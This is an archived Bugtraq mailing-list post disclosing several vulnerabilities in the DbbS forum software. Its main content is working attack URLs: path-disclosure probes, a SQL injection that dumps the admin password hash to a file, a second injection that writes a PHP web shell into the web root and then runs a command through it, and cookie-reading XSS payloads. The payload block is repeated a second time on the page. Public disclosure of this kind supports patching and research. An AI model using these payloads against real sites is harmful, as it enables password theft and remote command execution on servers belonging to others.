Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
DbbS<=2.0-alpha Multiple Vulnerabilities
Apr 16 2006 03:46AM
yamcho mail it
Special thanks to rgod for his help!!!
Full path disclosure
http://www.site.com/DbbS/topics.php?fcategoryid='
http://www.site.com/DbbS/script.php?unavariabile[]=
http://www.site.com/DbbS/script.php?GLOBALS[]=
http://www.site.com/DbbS/script.php?_SERVER[]=
MD5 Password
http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%2
0null,pass%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\test.txt'%20FRO
M%20forum_membres%20WHERE%20id='1'/*
Create shell
http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%2
0null,'<?php%20passthru($_GET[cmd]);?>'%20INTO%20DUMPFILE'c:\\inetpub\\w
wwroot\\dbbs\\suntzu.php'%20FROM%20forum_categories/*
Launch a command
http://www.site.com/DbbS/suntzu.php?cmd=dir
XSS
http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation="><scrip
t>alert(document.cookie)</script>
http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script
>alert(document.cookie)</script>
by rgod and yamcho
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Full path disclosure
http://www.site.com/DbbS/topics.php?fcategoryid='
http://www.site.com/DbbS/script.php?unavariabile[]=
http://www.site.com/DbbS/script.php?GLOBALS[]=
http://www.site.com/DbbS/script.php?_SERVER[]=
MD5 Password
http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%2
0null,pass%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\test.txt'%20FRO
M%20forum_membres%20WHERE%20id='1'/*
Create shell
http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%2
0null,'<?php%20passthru($_GET[cmd]);?>'%20INTO%20DUMPFILE'c:\\inetpub\\w
wwroot\\dbbs\\suntzu.php'%20FROM%20forum_categories/*
Launch a command
http://www.site.com/DbbS/suntzu.php?cmd=dir
XSS
http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation="><scrip
t>alert(document.cookie)</script>
http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script
>alert(document.cookie)</script>
by rgod and yamcho
[ reply ]